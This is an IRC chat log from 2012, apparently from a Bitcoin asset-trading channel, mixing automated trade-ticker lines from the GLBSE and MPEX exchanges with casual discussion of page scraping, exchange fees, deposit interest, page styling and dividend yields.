**** BEGIN LOGGING AT Thu Apr 12 23:03:54 2012 **** ENDING LOGGING AT Thu Apr 12 23:13:54 2012 **** BEGIN LOGGING AT Fri Apr 13 10:52:31 2012 Apr 13 11:00:40 <`MBot> [ GLBSE ] [ TRADE ] [ TYGRR-BOT ] [ 2 x 0.99999 = 1.999980 BTC ] Apr 13 11:01:55 <`MBot> [ GLBSE ] [ TRADE ] [ TYGRR-BOT ] [ 98 x 1.0 = 98.000000 BTC ] **** ENDING LOGGING AT Fri Apr 13 11:07:20 2012 **** BEGIN LOGGING AT Sun Apr 15 20:46:16 2012 Apr 15 20:47:30 ok Apr 15 20:47:35 i think this is working nao Apr 15 20:47:35 http://smpake.com/etc/btc/glbse.php Apr 15 20:48:09 i can add more Apr 15 20:48:19 i needs this Apr 15 20:48:19 'ticker' => 'BITBOND', Apr 15 20:48:19 'nbshares' => '10000', Apr 15 20:48:19 'hashrate' => '20000', Apr 15 20:48:19 'pps' => '105', Apr 15 20:49:27 where you getting the bids/asks from ? Apr 15 20:49:39 from glbse Apr 15 20:49:51 mmm Apr 15 20:49:53 $html = file_get_html("https://glbse.com/asset/view/".$dat['ticker']); Apr 15 20:49:53 $table = $html->find('.pres_table', 0); Apr 15 20:49:53 $rows = $table->find('tr'); Apr 15 20:50:00 foreach ($rows as $row){ Apr 15 20:50:01 if ($bid == 0 && $row->find('td',1)->plaintext>0){ Apr 15 20:50:01 .... Apr 15 20:50:24 so get them from mpex too . you got giga and pure there. Apr 15 20:50:29 nefario is giving us an api possibly tomorrow, likely by friday Apr 15 20:50:45 i am hc Apr 15 20:50:47 i dont need api Apr 15 20:50:53 :-) Apr 15 20:51:00 why not parse the json srsly ? Apr 15 20:51:11 your json? Apr 15 20:51:13 maybe i will Apr 15 20:51:15 yes. Apr 15 20:51:25 http://polimedia.us/bitcoin/mpex-vwap.php pick the 1day avg i guess Apr 15 20:51:36 then select best bid, best ask from the two. Apr 15 20:52:32 what about grabbing the last dividend amount for those shares (i know some haven't paid) eg. PUREMINING has, as has MERGEDMINING Apr 15 20:53:07 hmm... nvm, pure mining is multiple divs per week, Apr 15 20:53:28 well assuming Apr 15 20:53:31 you are not getting cheated Apr 15 20:53:37 this should be enough Apr 15 20:53:40 :> Apr 15 20:53:50 mircea_popescu: did you see brendio took 125 puremining shares to short ? Apr 15 20:54:05 i don't keep that close a watch. but good for him. Apr 15 20:54:06 which assets should i add Apr 15 20:54:07 from glbse Apr 15 20:54:08 now Apr 15 20:54:17 to this table Apr 15 20:54:36 BFLS? Apr 15 20:54:41 COGNITIVE Apr 15 20:54:56 mining only? **** ENDING LOGGING AT Sun Apr 15 20:55:01 2012 **** BEGIN LOGGING AT Tue May 22 02:36:39 2012 May 22 02:41:22 <`MBot> [ GLBSE ] [ TRADE ] [ ABM ] [ 2 @ 0.236 = 0.472000 BTC ] May 22 02:49:03 <`MBot> [ MPEX ] [ TRADE ] [ F.PURE.SYNTH ] [ 825 @ 0.00032950BTC = 0.271838 BTC ] May 22 02:50:39 <`MBot> [ MPEX ] [ TRADE ] [ F.GIGA.ETF ] [ 375 @ 0.00152950BTC = 0.573562 BTC ] May 22 02:51:22 <`MBot> [ MPEX ] [ TRADE ] [ B.PPTAPR.SYNTH ] [ 450 @ 0.00111100BTC = 0.499950 BTC ] May 22 02:51:52 <`MBot> [ GLBSE ] [ TRADE ] [ GIGAMINING ] [ 2 @ 1.51999999 = 3.040000 BTC ] May 22 02:52:08 <`MBot> [ MPEX ] [ TRADE ] [ F.GIGA.ETF ] [ 225 @ 0.00152950BTC = 0.344137 BTC ] May 22 02:59:23 <`MBot> [ GLBSE ] [ TRADE ] [ TYGRR-BANK ] [ 3 @ 0.11 = 0.330000 BTC ] May 22 03:03:51 <`MBot> [ GLBSE ] [ TRADE ] [ M.ETF ] [ 10 @ 0.29 = 2.900000 BTC ] May 22 03:04:39 <`MBot> [ GLBSE ] [ TRADE ] [ M.ETF ] [ 20 @ 0.3 = 6.000000 BTC ] May 22 03:57:28 anyone have a curl syntax for mpex? May 22 03:57:47 pigeons : you know pympex ? May 22 03:59:45 yeah, i have no luck with that May 22 04:00:38 UnicodeDecodeError: 'utf8' codec can't decode byte 0xf6 in position 25155: invalid start byte May 22 04:01:26 thats with python 2.7, I tried a few others May 22 04:02:15 <`MBot> [ GLBSE ] [ TRADE ] [ PPT.DIV ] [ 13 @ 1.49 = 19.370000 BTC ] May 22 04:06:33 <`MBot> [ MPEX ] [ TRADE ] [ S.MPOE ] [ 150 @ 0.00021419BTC = 0.032128 BTC ] May 22 04:10:12 <`MBot> [ GLBSE ] [ TRADE ] [ BTC-MINING ] [ 1 @ 0.99 = 0.990000 BTC ] May 22 04:13:59 <`MBot> [ GLBSE ] [ TRADE ] [ TYGRR-BANK ] [ 9 @ 0.11295 = 1.016550 BTC ] May 22 04:23:08 <`MBot> [ MPEX ] [ TRADE ] [ B.PPTMAY.SYNTH ] [ 350 @ 0.00109000BTC = 0.381500 BTC ] May 22 04:33:42 <`MBot> [ MPEX ] [ TRADE ] [ S.BVPS ] [ 125 @ 0.00284999BTC = 0.356249 BTC ] May 22 04:41:43 <`MBot> [ GLBSE ] [ TRADE ] [ PPT.E ] [ 20 @ 1.125 = 22.500000 BTC ] May 22 04:49:15 <`MBot> [ GLBSE ] [ TRADE ] [ MERGEDMINING ] [ 31 @ 0.145 = 4.495000 BTC ] **** BEGIN LOGGING AT Fri Aug 10 07:11:28 2012 Aug 10 07:11:36 profit/loss Aug 10 07:11:39 i think i got it actualy Aug 10 07:11:42 im trying out this new format Aug 10 07:11:42 Oh Aug 10 07:11:44 profit and loss Aug 10 07:11:48 but its not really gonna make sense Aug 10 07:11:51 until a few months goes by Aug 10 07:11:58 Well I don't really know anything about your business, but I could look at it lol Aug 10 07:12:00 and i dont have all the data to do it for previous months Aug 10 07:12:04 fuck it Aug 10 07:12:10 What is it you wanted me to see Aug 10 07:12:12 whaths the problem rg Aug 10 07:12:16 Just check the idea? Aug 10 07:12:25 no i was having a brain fart Aug 10 07:12:26 i got t now Aug 10 07:12:32 hehe Aug 10 07:12:34 this new sheet will have much more info Aug 10 07:14:13 [MPEX] [F.GIGA.ETF] 10780 @ 0.00100942 = 10.8815 BTC [-] Aug 10 07:14:17 ;;lastseen ColdHardMetal Aug 10 07:14:17 Error: "lastseen" is not a valid command. Aug 10 07:14:56 I'm gere Aug 10 07:14:58 o looky, patrickharnett. Aug 10 07:15:13 i recall you hated gribble a few months ago. Aug 10 07:15:14 [GLBSE] [GIGAMINING] 6 @ 1.1398 = 6.8388 BTC [+] Aug 10 07:15:28 no, just that I don't use it very much Aug 10 07:15:59 as seen from my failed attemt to use a "seen" command Aug 10 07:16:11 ;;seen turkishmelons Aug 10 07:16:12 I have not seen turkishmelons. Aug 10 07:16:50 I saw imsa use it a few days ago - I was hunting for Nefario, but he's travelling, so CHM was next on my list Aug 10 07:17:09 [GLBSE] [GIGAMINING] 5 @ 1.1399 = 5.6995 BTC [+] Aug 10 07:17:18 had a question about GLBSE password resets, because it isn't Aug 10 07:17:59 [MPEX] [F.GIGA.ETF] 8878 @ 0.00100693 = 8.9395 BTC [-] Aug 10 07:17:59 [MPEX] [F.GIGA.ETF] 10798 @ 0.00105247 = 11.3646 BTC [+] Aug 10 07:18:01 [MPEX] [F.GIGA.ETF] 13532 @ 0.00105444 = 14.2687 BTC [+] Aug 10 07:18:02 [MPEX] [F.GIGA.ETF] 10061 @ 0.0010621 = 10.6858 BTC [+] Aug 10 07:18:03 [MPEX] [F.GIGA.ETF] 6731 @ 0.00106232 = 7.1505 BTC [+] Aug 10 07:18:07 glbse is squeemish lately Aug 10 07:18:15 poor nefario Aug 10 07:18:21 he has no time to work on glbse even if he wanted to Aug 10 07:19:09 he doesn't? Aug 10 07:19:37 is this the guy who flew from china to us, got detained and reshipped then got detained back in china too ? Aug 10 07:19:53 [GLBSE] [YARR] 1 @ 1.63 BTC [-] Aug 10 07:19:55 [GLBSE] [FOO.PPPPT] 2 @ 1.014499 = 2.029 BTC [-] Aug 10 07:20:02 i recall reading this and thinking it's the worst travel horror. Aug 10 07:20:16 [GLBSE] [BIB.PIRATE] 1 @ 1.0299998 BTC [+] Aug 10 07:20:51 [MPEX] [F.GIGA.ETF] 4153 @ 0.00106232 = 4.4118 BTC [+] Aug 10 07:20:51 [MPEX] [F.GIGA.ETF] 17559 @ 0.00110079 = 19.3288 BTC [+] Aug 10 07:20:53 [MPEX] [F.GIGA.ETF] 3288 @ 0.00110698 = 3.6398 BTC [+] Aug 10 07:21:00 pretty sweet Aug 10 07:21:03 hey mircea, why the fees for joining your exchange are that high? Aug 10 07:21:05 we paid out $130 in divs last month Aug 10 07:21:08 paid out like $600 Aug 10 07:21:09 this month Aug 10 07:21:09 lol Aug 10 07:21:16 that's awesome Aug 10 07:21:17 BTC-Mining that's a relative term, no ? Aug 10 07:21:40 [GLBSE] [YARR] 1 @ 1.63 BTC [-] Aug 10 07:21:41 I suppose compared to traditional accounts... that's low fees. Aug 10 07:21:50 Still... Aug 10 07:21:54 traditional accounts have large % fees. Aug 10 07:21:58 [GLBSE] [JTME] 1 @ 0.9996 BTC [-] Aug 10 07:22:04 or maybe we're not talking of the same tradition. Aug 10 07:22:48 Aye, I suppose. But GLBSE works on 0.5% fees alone and those fees are fine as is, I find. Aug 10 07:23:02 glbse had .6 or .5 both ways, mpex has .2% one way Aug 10 07:23:07 the fees structure is a different implementation - some exchanges require listing, registry and trade fees in different proportions Aug 10 07:23:08 that's about 5x ? Aug 10 07:23:22 mircea Aug 10 07:23:29 i see your stock paid out a shitload this month Aug 10 07:23:33 very nice Aug 10 07:23:40 it paid a shitload last month too Aug 10 07:23:48 im curious if there's gonna be a 3 in a row. Aug 10 07:23:52 [GLBSE] [YARR] 3 @ 1.63 = 4.89 BTC [-] Aug 10 07:23:56 maybe i should buy some Aug 10 07:24:03 if i can get a good deal Aug 10 07:24:16 [GLBSE] [YARR] 5 @ 1.62 = 8.1 BTC [-] Aug 10 07:24:23 well maybe if there's no 3 in a row the price drops. Aug 10 07:24:45 And why not give it a little elegant touch for the eye? Those tables looks pretty barebone. Aug 10 07:25:10 BTC-Mining mpex is an exchange not a broker tho. Aug 10 07:25:24 it works fastly, cheaply and stably. the eye candy is a different store. Aug 10 07:25:57 bah Aug 10 07:26:01 southparkstudios.com isnt working Aug 10 07:26:07 I meant basic eye candy such as a very light CSS sheet. Aug 10 07:26:19 now i have to watch stupid asshole hulu Aug 10 07:26:28 rg try tpb lol Aug 10 07:26:48 BTC-Mining i think most browsers allow you to put a css in. Aug 10 07:26:59 [GLBSE] [ASICMINER] 80 @ 0.1 = 8 BTC Aug 10 07:29:05 I don't think it's standard to manually load CSS for other's websites Aug 10 07:29:07 [MPEX] [O.HASH.P10TH] 105000 @ 0.02154572 = 2262.3006 BTC [-] Aug 10 07:29:10 [GLBSE] [MOVETO.FUND] 2 @ 1.08 = 2.16 BTC [-] Aug 10 07:29:39 BTC-Mining man, i served >200gb of data from that directory alone last month. Aug 10 07:29:58 [GLBSE] [YARR] 5 @ 1.61 = 8.05 BTC [-] Aug 10 07:30:03 it's not made to be a broker. what it does is that it is never down, it loads fast, things like that. dja understand what i mean ? Aug 10 07:31:15 you guys gonna see htis chinese show Aug 10 07:31:25 http://www.hulu.com/watch/373280#s-p1-so-i0 Aug 10 07:31:30 where is vragnaroda ;/ Aug 10 07:31:35 he quit irc Aug 10 07:31:37 he and his azn bad shows Aug 10 07:31:38 o, rly ?! Aug 10 07:31:39 he couldnt take losing his ops Aug 10 07:31:44 ahaha Aug 10 07:33:39 [GLBSE] [BIB.BVPS] 200 @ 0.00449999 = 0.9 BTC [+] Aug 10 07:34:08 [GLBSE] [BIB.BVPS] 899 @ 0.0045 = 4.0455 BTC [+] Aug 10 07:34:08 [GLBSE] [BIB.BVPS] 1101 @ 0.0045 = 4.9545 BTC [+] Aug 10 07:35:14 I'm not 100% sure if you understand that a full styling would require no change of the html markup and use far less data to transfer than even a single of those pictures. Aug 10 07:35:37 And you could actually save on markup by switching to using css Aug 10 07:36:08 pictures, you mean graphs ? Aug 10 07:36:30 No, I mean the header pictures like the dragon or the siren Aug 10 07:36:43 you realise nobody reloads those ? Aug 10 07:36:53 i mean bots just ignore them and most browsers made after 1995 cache them Aug 10 07:37:19 Same for the CSS file. Aug 10 07:37:35 It can be cached and could save on markup on the page. Aug 10 07:37:57 show me one that does ? Aug 10 07:39:07 it's a different implementation to GLBSE, it's allowed to be different Aug 10 07:40:05 well i'd guess it's a different implementation from pretty much anytihng on the internet is his point Aug 10 07:40:07 hmm, CSS files, like image files, are cached by default Aug 10 07:41:15 BTC-Mining, there's two points here. one is that the page is pretty tight, if you look at it. Aug 10 07:41:40 the second is that i'm not putting engineer time into making it pretty, im putting engineer time into making it safe and fast. Aug 10 07:42:07 because those are my goals. it can be as ugly as roadkill, it's not even meant to be seen by the joe schmoe user. Aug 10 07:42:20 not anymore than the nyse backbone is. Aug 10 07:42:45 And my point was that I could make that page lighter AND have more style (although very basic). Aug 10 07:43:32 which is very good. you should do so! Aug 10 07:43:41 there's moneuy in it for you, too. Aug 10 07:44:31 I would do it for free (See how good a bargainer I am? =/) Aug 10 07:44:57 [GLBSE] [OBSI.HRPT] 1 @ 0.11 BTC [-] Aug 10 07:45:04 so go right ahead then. Aug 10 07:47:04 I'm on it Aug 10 07:47:15 [MPEX] [S.MPOE] 66942 @ 0.00029659 = 19.8543 BTC [-] Aug 10 07:47:17 [MPEX] [S.MPOE] 69110 @ 0.00029609 = 20.4628 BTC [-] Aug 10 07:47:18 [MPEX] [S.MPOE] 63289 @ 0.0002958 = 18.7209 BTC [-] Aug 10 07:47:19 [MPEX] [S.MPOE] 50659 @ 0.00029294 = 14.84 BTC [-] Aug 10 07:48:06 lmao investor confidence vote Aug 10 07:48:14 epic. Aug 10 07:49:05 [GLBSE] [TYGRR.BOND-P] 5 @ 1.02689999 = 5.1345 BTC [+] Aug 10 07:49:11 having achieved what I needed - I'll leave again. Have fun Aug 10 07:49:44 i wonder, who owns assbot ? Aug 10 07:50:35 kakobrekla I believe Aug 10 07:50:54 [GLBSE] [OBSI.HRPT] 8 @ 0.11999 = 0.9599 BTC [+] Aug 10 07:51:40 kakobrekla, any change to get the bot to collate ? Aug 10 07:59:55 The US is the greatest country on earth. Aug 10 08:00:08 I'm continuously amazed by what a great country it is. Aug 10 08:06:16 a hey Aug 10 08:06:21 [GLBSE] [NYAN.C] 1 @ 1 BTC [-] Aug 10 08:08:21 hey mircea_popescu Aug 10 08:08:28 hey Aug 10 08:08:29 have you been giving out free BTC? Aug 10 08:08:46 back whatever many months ago there was a free optionsevent Aug 10 08:08:46 I received two small payments last week which I never asked for Aug 10 08:08:54 from me ? Aug 10 08:09:02 well, from the address I once used to withdraw from mpex Aug 10 08:09:19 mmm, send me links in pm ? Aug 10 08:09:30 sec Aug 10 08:12:35 ;;ident mircea_popescu Aug 10 08:12:35 Nick 'mircea_popescu', with hostmask 'mircea_popescu!~Mircea@trilema/mircea-popescu', is not identified. Aug 10 08:12:41 ;;eauth mircea_popescu Aug 10 08:12:42 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@trilema/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Aug 10 08:13:18 ;;everify freenode:#bitcoin-otc:f2557566240958a17d48ee346cbffed9f4e29b96016778e0682b1fa0 Aug 10 08:13:19 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Aug 10 08:32:29 [MPEX] [S.MPOE] 25119 @ 0.00030209 = 7.5882 BTC [+] Aug 10 08:34:16 [GLBSE] [PPT.A] 1 @ 1.14 BTC [-] Aug 10 08:34:49 ;;eauth patrickharnett Aug 10 08:34:50 Request successful for user patrickharnett, hostmask patrickharnett!cb4f5ec0@gateway/web/freenode/ip.203.79.94.192. Get your encrypted OTP from http://bitcoin-otc.com/otps/3DFE38199BDB9DAB Aug 10 08:36:08 ;;everify freenode:#bitcoin-otc:e23547f695ceeda61b09c05b155587c2af507c2c80482b117e679238 Aug 10 08:36:09 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu Aug 10 08:36:26 haha evil Aug 10 08:36:47 two tier chan system! Aug 10 08:36:49 haha back Aug 10 08:37:14 and ?? Aug 10 08:37:22 /join #bitcoin-otc-eu Aug 10 08:37:41 ;;everify freenode:#bitcoin-otc:e23547f695ceeda61b09c05b155587c2af507c2c80482b117e679238 Aug 10 08:37:41 You are now authenticated for user PatrickHarnett with key 3DFE38199BDB9DAB Aug 10 08:38:36 well, that matches the key I have saved, so must be doing something right Aug 10 08:38:38 [GLBSE] [OBSI.HRPT] 2 @ 0.11998 = 0.24 BTC [-] Aug 10 08:43:11 [GLBSE] [TYGRR.BOND-PI] 10 @ 1.6 = 16 BTC [+] Aug 10 08:43:50 would be pretty funny if you managed to log in and it was a key you never saw before. Aug 10 08:53:59 [GLBSE] [NYAN.C] 5 @ 1 = 5 BTC [-] Aug 10 08:54:55 [GLBSE] [NYAN.B] 5 @ 1 = 5 BTC [+] Aug 10 08:59:30 pff Aug 10 08:59:34 these mpoe prices suck Aug 10 08:59:46 what'd it do nao Aug 10 09:00:15 getting better... Aug 10 09:00:38 oh mircea Aug 10 09:00:41 no more interest on deposits? Aug 10 09:00:44 that's weaaaaak Aug 10 09:00:47 laaaaaaame Aug 10 09:00:56 it was a nightmare to implement. Aug 10 09:01:00 boooooooooooooooo Aug 10 09:01:23 all 12 MPEX users are PISSED. Aug 10 09:01:25 didnt you say they sucked for being too unpiratey low ? Aug 10 09:01:39 better than nothin Aug 10 09:01:40 haha there's a little moar than a dozen. Aug 10 09:01:42 safer than pirate Aug 10 09:01:54 ^^ two very good reasons Aug 10 09:02:07 at the current rate of btc->usd Aug 10 09:02:10 those interest payouts would be good Aug 10 09:02:26 "balance" : 2049.61958305, Aug 10 09:02:32 rg the problem's like this : if i do them high frequency they're an insane load. Aug 10 09:02:41 if i do them lower frequency and regularly they're too easy to game Aug 10 09:02:48 as in, ppl put money in 5 minutes before interest time Aug 10 09:02:52 take it 5 minutes later Aug 10 09:03:02 yeah Aug 10 09:03:04 and if i do them irregularly it quickly becomes insane and people like jurov scream at me Aug 10 09:03:07 why dont you do it like a share reward Aug 10 09:03:13 like a mining pool would do Aug 10 09:03:19 i'd like to have them, but atm it's just not technologically feasible. Aug 10 09:03:22 how's that? Aug 10 09:03:28 people who join at the last minute before a block still only get paid for the work they submitted Aug 10 09:03:37 not the age of their deposit/work Aug 10 09:03:48 so that's how you should do interest Aug 10 09:03:52 its calculated on how long its in there Aug 10 09:03:58 longer deposit = higher tier of interest Aug 10 09:04:04 shorter deposit = low / none interest Aug 10 09:04:08 you mean like how pirate does it? ;) Aug 10 09:04:09 yes but this has to all be tracked. Aug 10 09:04:15 [MPEX] [S.MPOE] 15507 @ 0.00029294 = 4.5426 BTC [-] Aug 10 09:04:16 [MPEX] [S.MPOE] 20092 @ 0.00028588 = 5.7439 BTC [-] Aug 10 09:04:17 there's a lot of accounts in spite of what you might think Aug 10 09:04:17 no bitfoo Aug 10 09:04:24 less pyramiddy than pirate Aug 10 09:04:27 sure sure Aug 10 09:04:33 but he tracks average balance over the week Aug 10 09:04:38 its just a cheap proof method Aug 10 09:04:44 to keep people from fucking over our romanian friend here Aug 10 09:05:03 doesnt matter anyway though, he's discontinued the feature Aug 10 09:05:16 i'll bring it back when/if i manage to find a sane way to do it. Aug 10 09:05:24 i guess those coders he hired who told him they were awesome werent such hot shit after all Aug 10 09:05:36 haha Aug 10 09:05:38 lol Aug 10 09:05:57 mircea has MPOE_PR reading Teach Yourself Python in 24 hrs Aug 10 09:06:01 you need to get some new stocks on mpex Aug 10 09:06:01 the code is trivial man. it's just a simple matter of "how often are you willing to sample balances" and "can you live with the fact it won't be precise" Aug 10 09:06:05 or PHP Aug 10 09:06:08 i forget what its written in Aug 10 09:06:19 it's written in paranthesis. Aug 10 09:06:33 you shoulda wrote it in D Aug 10 09:06:33 mircea_popescu: you don't need to sample to compute average balance Aug 10 09:06:39 bitfoo that i do. sadly all the good companies don't want to list, and fellows like rg here just run with everyone's money Aug 10 09:06:56 hmm, sucks Aug 10 09:06:58 bitfoo it could be done by movements too Aug 10 09:07:05 lol Aug 10 09:07:06 yeah, that would be the only "right" way Aug 10 09:07:14 watch your mouth Aug 10 09:07:22 the investors who stuck it out with us are happi Aug 10 09:07:30 yeah bitfoo. it's still being looked into, just, the prev version was shit what can i say. Aug 10 09:07:40 rg im just teasing you homie. Aug 10 09:07:47 i know Aug 10 09:07:48 I'm pissed. My 2 BTC could have earned me a few satoshi moar!! Aug 10 09:07:59 actually i saw some proffit taking on bvps i think Aug 10 09:08:11 someone made some money this month Aug 10 09:08:14 bitfoo hang in there, by the time you're short a dolla it may all be fixed. Aug 10 09:08:20 the stock is kinda stale tho Aug 10 09:08:22 heh Aug 10 09:08:25 people who wanted bvps have it Aug 10 09:08:27 people who dont, sold it Aug 10 09:08:32 so its just kinda sitting there Aug 10 09:08:37 people who are holding it just take in the profit Aug 10 09:08:40 no sales going on Aug 10 09:08:55 that's not such a bad way to be. Aug 10 09:09:37 incidentally, anyone here know deathandtaxes on the forum ? Aug 10 09:09:39 is he even on irc ? Aug 10 09:09:41 rg: ?? you can not take profit if you hold it Aug 10 09:10:01 EskimoBob: dividends? Aug 10 09:10:22 i think he meant company profits not stock profits EskimoBob Aug 10 09:11:01 lol, i just figured out why the bot is called assbot. Only took me a month or so Aug 10 09:11:15 assets duh Aug 10 09:11:18 sharp one :D Aug 10 09:11:30 <`MBot> [ MPEX ] [ TRADE ] [ S.BVPS ] [ 125 @ 0.00284999BTC = 0.356249 BTC ] Aug 10 09:11:37 i still have stuff from the old days on this page. Aug 10 09:14:56 [GLBSE] [TYGRR.BOND-B] 1 @ 0.098 BTC [-] Aug 10 09:15:36 Almost done mircea... now I need to convert all the html markup for a previewable demo Aug 10 09:15:45 what's the best thing to buy on glbse right now Aug 10 09:15:50 tell me Aug 10 09:15:52 and ill buy it Aug 10 09:15:55 40 btc worth Aug 10 09:16:54 define "best" Aug 10 09:16:58 mpoe.etf ? Aug 10 09:17:14 i think you'd double smickles' week or something Aug 10 09:18:20 oh Aug 10 09:18:23 i can just buy mpoe on mpex Aug 10 09:20:20 [GLBSE] [MPOE.ETF] 1 @ 1.12 BTC [+] Aug 10 09:20:28 like dat? Aug 10 09:20:34 hehe Aug 10 09:20:38 im gonna put in a lower offer Aug 10 09:20:41 maybe someone will fill i Aug 10 09:20:50 00030209 is the lowest Aug 10 09:21:01 [GLBSE] [TYGRR.BOND-A] 1 @ 0.1592 BTC [+] Aug 10 09:21:02 if i could get it for maybe... 00030000 Aug 10 09:21:10 or 00029000 Aug 10 09:22:26 mircea Aug 10 09:22:30 im gonna give you a number of shares Aug 10 09:22:32 and you tell me Aug 10 09:22:37 how much the div would be on that amount of shares Aug 10 09:22:39 last month Aug 10 09:22:41 ok? Aug 10 09:22:55 glbse shows div per share Aug 10 09:22:55 (shares in mpoe) Aug 10 09:23:07 weeeeeelp mpex doesnt Aug 10 09:23:38 wweeeeeeeeeeelp ok Aug 10 09:33:09 [GLBSE] [PUREMINING] 5 @ 0.138 = 0.69 BTC [-] Aug 10 09:33:10 [GLBSE] [PUREMINING] 1 @ 0.138 BTC [-] Aug 10 09:33:40 So mircea, by adding a 733 bytes css file, you can cut all extra table rows markup and height/colspan/rowspan markup. Aug 10 09:33:50 [GLBSE] [YABMC] 1 @ 0.114799 BTC [+] Aug 10 09:34:11 And get a slight eye candy Aug 10 09:36:25 [GLBSE] [OBSI.HRPT] 3 @ 0.105 = 0.315 BTC [-] Aug 10 09:37:07 [GLBSE] [FOO.PPPPT] 1 @ 1.014499 BTC [-] Aug 10 09:41:22 what do you think of that? Aug 10 09:43:59 mircea_popescu Aug 10 09:44:57 [MPEX] [F.GIGA.ETF] 4688 @ 0.00110698 = 5.1895 BTC [+] Aug 10 09:56:37 darn... Aug 10 09:59:23 ye ye i am here Aug 10 09:59:36 was in a conference for a little. Aug 10 10:00:09 BTC-Mining lettuce see this ? Aug 10 10:00:20 rg it does show it, on twitter. Aug 10 10:00:28 yup Aug 10 10:00:28 trying to get whoever runs the bot here to also pipe it in Aug 10 10:01:18 and dividend was 1`068.67052326 btc for 1bn shares in july, Aug 10 10:01:36 1`584.69669113btc for 1bn shares in june Aug 10 10:03:01 [GLBSE] [ZETA-MINING] 28 @ 0.12 = 3.36 BTC [-] Aug 10 10:05:47 so yeah, you actually save 8 bytes per option/fund/stock line, plus the superfluous space table rows Aug 10 10:07:16 Considering the css file is cacheable and there's almost 100 such lines, it's only a slight page size reduction, but with a better styling Aug 10 10:08:14 [GLBSE] [TYGRR.BOND-PI] 14 @ 1.6 = 22.4 BTC [+] Aug 10 10:08:54 See, quite possible to achieve. Now to know if you would care to implement it is another thing. Aug 10 10:10:21 BTC-Mining it does have the disadvantage that everyone scrapping that page will have to rewrite some code, so it won't happen overnight. Aug 10 10:10:50 [MPEX] [S.MPOE] 70202 @ 0.00030209 = 21.2073 BTC [+] Aug 10 10:12:59 ah, no API? Aug 10 10:13:24 yeah there's rss and jsons too Aug 10 10:14:08 so why scrape the page when there's an API =/ Aug 10 10:14:16 sounds counter productive... Aug 10 10:14:28 i think you've not met people. Aug 10 10:14:34 they are the strangest thing. Aug 10 10:14:36 oh well Aug 10 10:15:10 so what's the public notion, http://www.namworld.net/mpex.html vs http://polimedia.us/bitcoin/mpex.php ? Aug 10 10:15:34 [MPEX] [S.MPOE] 56965 @ 0.00028588 = 16.2852 BTC [-] Aug 10 10:15:36 [MPEX] [S.MPOE] 8963 @ 0.00028241 = 2.5312 BTC [-] Aug 10 10:16:40 The consensus seems to be to keep trading, not reading a chat. Aug 10 10:16:54 hehe Aug 10 10:17:11 who here wants to buy a dedicated server? Aug 10 10:17:19 woah now Aug 10 10:17:20 1 at a time Aug 10 10:17:34 we'll end up kicked for polluting everyone's quotestream Aug 10 10:19:45 I thought assets-trade was the "clean quotestream" Aug 10 10:20:03 o ? ok than! Aug 10 10:20:32 no such chan even ? Aug 10 10:21:07 #bitcoin-assets-trade Aug 10 10:21:07 a ok there it is nm me Aug 10 10:21:19 wait... wrong Aug 10 10:21:32 s Aug 10 10:21:34 with s on end Aug 10 10:21:37 indeed Aug 10 10:21:43 Your order to BUY 150000 S.MPOE @0.00030009BTC each has been received and will be processed. Aug 10 10:22:01 mircea Aug 10 10:22:06 calculate what my div payment wouldve been Aug 10 10:22:10 had i had those 150k shares Aug 10 10:22:12 last moth Aug 10 10:23:27 .py 1068.67052326 * 150000 / 1000000000 Aug 10 10:23:32 0.160300578489 Aug 10 10:23:54 lol Aug 10 10:24:45 my chicken nuggets wont get crispy Aug 10 10:29:01 what's that lessee Aug 10 10:29:36 .py 0.160300578489 * 12 / (150000*0.00030009) Aug 10 10:29:37 0.0427340007302 Aug 10 10:29:46 like 4.3% p a in dividends. Aug 10 10:31:25 .py (1068.67052326 * 150000 / 1000000000 + 1584.69669113 * 150000 / 1000000000) * 6 / (150000*0.00030009) Aug 10 10:31:26 0.0530514288591 Aug 10 10:31:36 like 5.3% on the basis of past 2 months Aug 10 10:32:02 mircea Aug 10 10:32:06 you know how i feel about math Aug 10 10:32:19 you feel it has raped your inner child with a fork ? Aug 10 10:33:30 well i do now Aug 10 10:33:30 fuck Aug 10 10:35:04 [MPEX] [S.MPOE] 51338 @ 0.00030209 = 15.5087 BTC [+] Aug 10 10:38:33 [GLBSE] [ZETA-MINING] 2 @ 0.12 = 0.24 BTC [-] Aug 10 10:38:35 [GLBSE] [ZETA-MINING] 2 @ 0.1329 = 0.2658 BTC [+] Aug 10 10:38:36 [GLBSE] [ZETA-MINING] 100 @ 0.13488 = 13.488 BTC [+] Aug 10 10:38:37 [GLBSE] [ZETA-MINING] 4 @ 0.1349 = 0.5396 BTC [+] Aug 10 10:38:38 [GLBSE] [ZETA-MINING] 2 @ 0.13999 = 0.28 BTC [+] Aug 10 10:43:31 [GLBSE] [OBSI.HRPT] 3 @ 0.11912 = 0.3574 BTC [+] Aug 10 10:57:36 [GLBSE] [TYGRR.BOND-P] 4 @ 1.02020001 = 4.0808 BTC [-] Aug 10 10:57:38 [GLBSE] [TYGRR.BOND-P] 3 @ 1.02010001 = 3.0603 BTC [-] Aug 10 10:57:39 [GLBSE] [TYGRR.BOND-P] 10 @ 1.02 = 10.2 BTC [-] Aug 10 10:57:40 [GLBSE] [TYGRR.BOND-P] 100 @ 1.014 = 101.4 BTC [-] Aug 10 10:57:42 [GLBSE] [TYGRR.BOND-P] 100 @ 1.013 = 101.3 BTC [-] Aug 10 10:57:43 [GLBSE] [TYGRR.BOND-P] 37 @ 1.012 = 37.444 BTC [-] Aug 10 10:57:44 [GLBSE] [TYGRR.BOND-P] 100 @ 1.01 = 101 BTC [-] Aug 10 10:57:45 [GLBSE] [TYGRR.BOND-P] 43 @ 1.001 = 43.043 BTC [-] Aug 10 10:59:01 [GLBSE] [TYGRR.BOND-P] 3 @ 1 = 3 BTC [-] Aug 10 10:59:30 [GLBSE] [FOO.PPPPT] 2 @ 1.0001 = 2.0002 BTC [-] Aug 10 10:59:32 [GLBSE] [FOO.PPPPT] 4 @ 1 = 4 BTC [-] Aug 10 10:59:46 [GLBSE] [BIF.BTCST.PPT] 2 @ 1 = 2 BTC [-] Aug 10 10:59:47 [GLBSE] [BIF.BTCST.PPT] 6 @ 1 = 6 BTC [-] Aug 10 11:04:18 [MPEX] [F.GIGA.ETF] 2498 @ 0.00110698 = 2.7652 BTC [+] Aug 10 11:04:20 [MPEX] 